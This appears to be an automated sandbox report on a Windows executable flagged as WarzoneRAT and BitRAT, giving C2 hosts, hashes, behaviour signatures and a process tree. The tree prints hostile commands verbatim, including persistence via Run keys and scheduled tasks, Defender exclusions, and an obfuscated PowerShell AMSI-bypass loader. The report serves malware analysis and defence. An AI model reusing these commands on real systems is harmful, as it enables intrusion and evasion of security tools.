Overview

overview

10

Static

static

ff64fcc6cc...9c.exe

windows7-x64

10

ff64fcc6cc...9c.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    27s
  • max time network
    130s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-12-2022 13:24

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe

  • Size

    8.8MB

  • MD5

    bd40cd2f9b60a3b24f9a59d39d234374

  • SHA1

    28888c62f7a8a3b7a8fe6213b9fb2a9883c9b1cb

  • SHA256

    ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c

  • SHA512

    c6272bf8ab06fbd0d2e5f7e8488c0c1f686f6bf5ad255762d61f7121bd7148816174366a521a6cbd9be4df1b2d22e6fbea5cbad20bac8ffe9d8445847dbb636b

  • SSDEEP

    196608:LiDSsREt5lLjiCIJMrsSO6YNoxzVwdFnRZmpL2FxrQtyBP:0SsKtfLjjHBB4SpL0rQ

Score
10/10
bitratwarzoneratinfostealerpersistencerattrojan

Malware Config

Extracted

Family

warzonerat

C2

cabalfenix.ddns.net:1807

Extracted

Family

bitrat

Version

1.38

C2

cabalfenix.ddns.net:1235

Attributes
  • communication_password

    81dc9bdb52d04dc20036dbd8313ed055

  • install_dir

    $77Install path

  • install_file

    $77Install name

  • tor_process

    tor

Signatures

  • BitRAT

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

    trojanbitrat
  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

    ratinfostealerwarzonerat
  • Executes dropped EXE 7 IoCs
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
    persistence
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies registry class 47 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 40 IoCs
  • Suspicious use of FindShellTrayWindow 48 IoCs
  • Suspicious use of SendNotifyMessage 22 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe
    "C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:5036
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '$77INJECTOR';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '$77INJECTOR' -Value '"C:\Users\Admin\AppData\Roaming\$77INJECTOR\$77INJECTOR.exe"' -PropertyType 'String'
      2⤵
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4924
    • C:\Windows\SysWOW64\cmd.exe
      "cmd" /C schtasks /create /tn \$77INJECTOR /tr "C:\Users\Admin\AppData\Roaming\$77INJECTOR\$77INJECTOR.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:808
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn \$77INJECTOR /tr "C:\Users\Admin\AppData\Roaming\$77INJECTOR\$77INJECTOR.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
        3⤵
        • Creates scheduled task(s)
        PID:3536
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      #cmd
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2416
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAYgB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AaQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAdwBhACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAZwBuACMAPgA="
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3860
      • C:\Users\Admin\AppData\Local\Temp\$77Install.exe
        "C:\Users\Admin\AppData\Local\Temp\$77Install.exe"
        3⤵
        • Executes dropped EXE
        PID:3748
      • C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
        "C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe"
        3⤵
        • Executes dropped EXE
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        PID:2908
      • C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe
        "C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:212
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell Add-MpPreference -ExclusionPath C:\
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2264
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\$77images.exe"
          4⤵
            PID:2848
            • C:\Windows\SysWOW64\reg.exe
              REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\$77images.exe"
              5⤵
                PID:3172
            • C:\ProgramData\$77images.exe
              "C:\ProgramData\$77images.exe"
              4⤵
              • Executes dropped EXE
              PID:3560
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell Add-MpPreference -ExclusionPath C:\
                5⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:4152
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe"
                5⤵
                  PID:1472
            • C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe
              "C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe"
              3⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:3772
            • C:\Users\Admin\AppData\Local\Temp\$77icaro.exe
              "C:\Users\Admin\AppData\Local\Temp\$77icaro.exe"
              3⤵
              • Executes dropped EXE
              • Checks computer location settings
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4432
              • C:\Windows\explorer.exe
                "C:\Windows\explorer.exe"
                4⤵
                • Modifies Installed Components in the registry
                • Enumerates connected drives
                • Checks SCSI registry key(s)
                • Modifies registry class
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                PID:572
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe
                4⤵
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4260
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
                  5⤵
                    PID:3160
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                      6⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1436
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
                    5⤵
                      PID:2436
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
                        6⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4444
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe & exit
                    4⤵
                      PID:4852
                      • C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe
                        C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe
                        5⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4668
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:WOtmSWFShvRL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$pfjvFlSDBXsxDi,[Parameter(Position=1)][Type]$CjhdyUjELm)$udbfxqizmVH=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+'f'+'l'+'e'+'ct'+[Char](101)+'d'+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'gat'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+'M'+'o'+''+'d'+''+'u'+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+'e'+''+[Char](84)+'yp'+[Char](101)+'','C'+'l'+''+'a'+''+'s'+''+[Char](115)+','+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+'c'+','+[Char](83)+'e'+[Char](97)+'l'+[Char](101)+''+'d'+''+','+''+[Char](65)+''+'n'+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+',A'+[Char](117)+''+'t'+'o'+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$udbfxqizmVH.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+'p'+''+[Char](101)+'ci'+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+'d'+'e'+'By'+[Char](83)+'i'+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$pfjvFlSDBXsxDi).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+','+'M'+'a'+'n'+''+[Char](97)+'ged');$udbfxqizmVH.DefineMethod(''+'I'+'n'+'v'+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+','+'Hi'+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+'g'+''+[Char](44)+'N'+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+''+'i'+''+[Char](114)+'t'+[Char](117)+'al',$CjhdyUjELm,$pfjvFlSDBXsxDi).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'ti'+[Char](109)+'e'+[Char](44)+'M'+'a'+''+[Char](110)+'a'+[Char](103)+'ed');Write-Output $udbfxqizmVH.CreateType();}$OoNMDpxBWibyq=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')}).GetType('Mi'+[Char](99)+''+[Char](114)+'o'+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+'af'+'e'+''+'O'+''+'o'+''+[Char](78)+''+'M'+''+[Char](68)+''+'p'+''+'x'+''+'B'+'W'+[Char](105)+''+[Char](98)+''+[Char](121)+''+[Char](113)+'');$pSxMtMXrgQCnhN=$OoNMDpxBWibyq.GetMethod('p'+[Char](83)+''+[Char](120)+''+'M'+''+[Char](116)+''+'M'+''+[Char](88)+''+'r'+'g'+'Q'+''+[Char](67)+''+[Char](110)+''+'h'+''+'N'+'',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$hwiWSEMWABBejCSBBAf=WOtmSWFShvRL @([String])([IntPtr]);$tebFqUkDLOwRrMToAKFvzU=WOtmSWFShvRL @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$JlaihCxEFiI=$OoNMDpxBWibyq.GetMethod(''+[Char](71)+'e'+'t'+'M'+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+[Char](110)+''+[Char](101)+''+'l'+'3'+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$HkssHkJtViOVNJ=$pSxMtMXrgQCnhN.Invoke($Null,@([Object]$JlaihCxEFiI,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+[Char](100)+''+'L'+''+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+''+'y'+'A')));$yEmWqtIjIKAKqAVit=$pSxMtMXrgQCnhN.Invoke($Null,@([Object]$JlaihCxEFiI,[Object](''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$raNrStu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HkssHkJtViOVNJ,$hwiWSEMWABBejCSBBAf).Invoke(''+'a'+''+'m'+'s'+[Char](105)+''+'.'+'d'+[Char](108)+''+[Char](108)+'');$kijCdUeoZuAnJNFXn=$pSxMtMXrgQCnhN.Invoke($Null,@([Object]$raNrStu,[Object](''+[Char](65)+'m'+'s'+'i'+[Char](83)+''+[Char](99)+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+'f'+''+'e'+''+[Char](114)+'')));$bLvdKwpgzr=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yEmWqtIjIKAKqAVit,$tebFqUkDLOwRrMToAKFvzU).Invoke($kijCdUeoZuAnJNFXn,[uint32]8,4,[ref]$bLvdKwpgzr);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$kijCdUeoZuAnJNFXn,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yEmWqtIjIKAKqAVit,$tebFqUkDLOwRrMToAKFvzU).Invoke($kijCdUeoZuAnJNFXn,[uint32]8,0x20,[ref]$bLvdKwpgzr);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+'A'+[Char](82)+'E').GetValue(''+[Char](36)+''+[Char](55)+'7'+[Char](115)+'t'+'a'+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)
                1⤵
                  PID:4636
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:AyQtOnZxLTaz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$LCnzyOUSddtaFk,[Parameter(Position=1)][Type]$UakHJczsjl)$qfggMrAoIXv=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+'e'+'m'+''+[Char](111)+'ry'+[Char](77)+'o'+[Char](100)+''+[Char](117)+'le',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+'te'+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+','+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+'ic'+[Char](44)+'Se'+[Char](97)+'l'+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+'n'+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+'l'+'a'+'s'+[Char](115)+'',[MulticastDelegate]);$qfggMrAoIXv.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+'a'+[Char](108)+''+[Char](78)+''+[Char](97)+'m'+'e'+','+[Char](72)+'ide'+[Char](66)+''+[Char](121)+'Sig'+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$LCnzyOUSddtaFk).SetImplementationFlags('R'+'u'+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');$qfggMrAoIXv.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'',''+'P'+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+'ide'+[Char](66)+''+'y'+'S'+[Char](105)+''+'g'+''+[Char](44)+''+'N'+'ewSl'+'o'+''+'t'+''+','+''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+'ua'+[Char](108)+'',$UakHJczsjl,$LCnzyOUSddtaFk).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+'M'+'a'+'n'+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');Write-Output $qfggMrAoIXv.CreateType();}$rYVFnUAlTrsWl=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+''+[Char](116)+'e'+'m'+''+[Char](46)+'d'+'l'+''+'l'+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+[Char](46)+'Wi'+'n'+''+[Char](51)+''+[Char](50)+'.'+'U'+''+'n'+'s'+[Char](97)+''+[Char](102)+'e'+[Char](114)+''+[Char](89)+'V'+[Char](70)+''+'n'+''+'U'+''+[Char](65)+''+'l'+''+[Char](84)+''+[Char](114)+''+'s'+'Wl');$uBiOvSuBbnJfpW=$rYVFnUAlTrsWl.GetMethod(''+'u'+''+[Char](66)+''+[Char](105)+''+'O'+''+[Char](118)+''+'S'+'u'+[Char](66)+''+'b'+''+[Char](110)+''+[Char](74)+''+'f'+'p'+[Char](87)+'',[Reflection.BindingFlags]''+'P'+''+[Char](117)+'b'+[Char](108)+''+'i'+''+[Char](99)+',S'+[Char](116)+'a'+[Char](116)+''+'i'+''+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$BbpOVFUxnorBTkxGvjC=AyQtOnZxLTaz @([String])([IntPtr]);$oZxccsDUJBpjlLKxNJSXyh=AyQtOnZxLTaz @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ITjqlmzkwBc=$rYVFnUAlTrsWl.GetMethod('G'+[Char](101)+''+'t'+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+'a'+''+[Char](110)+''+[Char](100)+''+'l'+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+''+[Char](50)+'.d'+[Char](108)+''+[Char](108)+'')));$wVpgrxmdXxYtdd=$uBiOvSuBbnJfpW.Invoke($Null,@([Object]$ITjqlmzkwBc,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+[Char](100)+'L'+'i'+'b'+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$AtYTgCLZlVLfKbWiR=$uBiOvSuBbnJfpW.Invoke($Null,@([Object]$ITjqlmzkwBc,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+'u'+[Char](97)+''+[Char](108)+''+'P'+''+'r'+''+'o'+''+'t'+'e'+'c'+''+'t'+'')));$ntoRZJq=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wVpgrxmdXxYtdd,$BbpOVFUxnorBTkxGvjC).Invoke(''+'a'+'m'+[Char](115)+''+'i'+'.'+[Char](100)+'l'+[Char](108)+'');$hvRSorvhVPjOjqRcZ=$uBiOvSuBbnJfpW.Invoke($Null,@([Object]$ntoRZJq,[Object]('A'+'m'+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+''+[Char](97)+''+'n'+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+'r')));$HePbTHHcGC=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AtYTgCLZlVLfKbWiR,$oZxccsDUJBpjlLKxNJSXyh).Invoke($hvRSorvhVPjOjqRcZ,[uint32]8,4,[ref]$HePbTHHcGC);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$hvRSorvhVPjOjqRcZ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AtYTgCLZlVLfKbWiR,$oZxccsDUJBpjlLKxNJSXyh).Invoke($hvRSorvhVPjOjqRcZ,[uint32]8,0x20,[ref]$HePbTHHcGC);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOF'+[Char](84)+''+[Char](87)+'A'+'R'+'E').GetValue(''+[Char](36)+'7'+[Char](55)+'s'+[Char](116)+''+'a'+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
                  1⤵
                    PID:4092
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n42f4axy\n42f4axy.cmdline"
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3980
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESECD6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC7FCCC60AE1614FD7B713EA441ED24B43.TMP"
                      2⤵
                        PID:4524
                    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                      1⤵
                      • Modifies registry class
                      • Suspicious use of SetWindowsHookEx
                      PID:3252
                    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                      1⤵
                      • Enumerates system info in registry
                      • Modifies registry class
                      • Suspicious use of SetWindowsHookEx
                      PID:1124
                    • C:\Windows\System32\dllhost.exe
                      C:\Windows\System32\dllhost.exe /Processid:{f6ecc4b9-3dd8-44cd-92c1-e74b525bf90c}
                      1⤵
                        PID:2504

                      Network

                      MITRE ATT&CK Enterprise v6

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\ProgramData\$77images.exe
                        Filesize

                        152KB

                        MD5

                        48092158c6601dba353421f70d501025

                        SHA1

                        01d0d5149e9b690a84554fb4ac72fdbdad6d56d2

                        SHA256

                        9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405

                        SHA512

                        b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434

                        Download Submit

                      • C:\ProgramData\$77images.exe
                        Filesize

                        152KB

                        MD5

                        48092158c6601dba353421f70d501025

                        SHA1

                        01d0d5149e9b690a84554fb4ac72fdbdad6d56d2

                        SHA256

                        9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405

                        SHA512

                        b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                        Filesize

                        1KB

                        MD5

                        33b19d75aa77114216dbc23f43b195e3

                        SHA1

                        36a6c3975e619e0c5232aa4f5b7dc1fec9525535

                        SHA256

                        b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2

                        SHA512

                        676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                        Filesize

                        53KB

                        MD5

                        124edf3ad57549a6e475f3bc4e6cfe51

                        SHA1

                        80f5187eeebb4a304e9caa0ce66fcd78c113d634

                        SHA256

                        638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675

                        SHA512

                        b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        Filesize

                        16KB

                        MD5

                        39c9199f60a330471595859d6cdc0a6d

                        SHA1

                        eb9c797cb6f892c0a77b91ff6a6337f2ce958c24

                        SHA256

                        bae534da4c46d8a9137cd8aadddf9ce6a297edc7f7e05fe9cee777a4b6221411

                        SHA512

                        421ab0885d1b59e5705fc47912a90c546b01d7d5b5ab0b53195d5d854174e48524a73488ae80651d0b2350837f21a4070792dc1b6e4553beffa6203a931ace14

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        Filesize

                        18KB

                        MD5

                        70f94f425bc3f24106790d4c7d46b792

                        SHA1

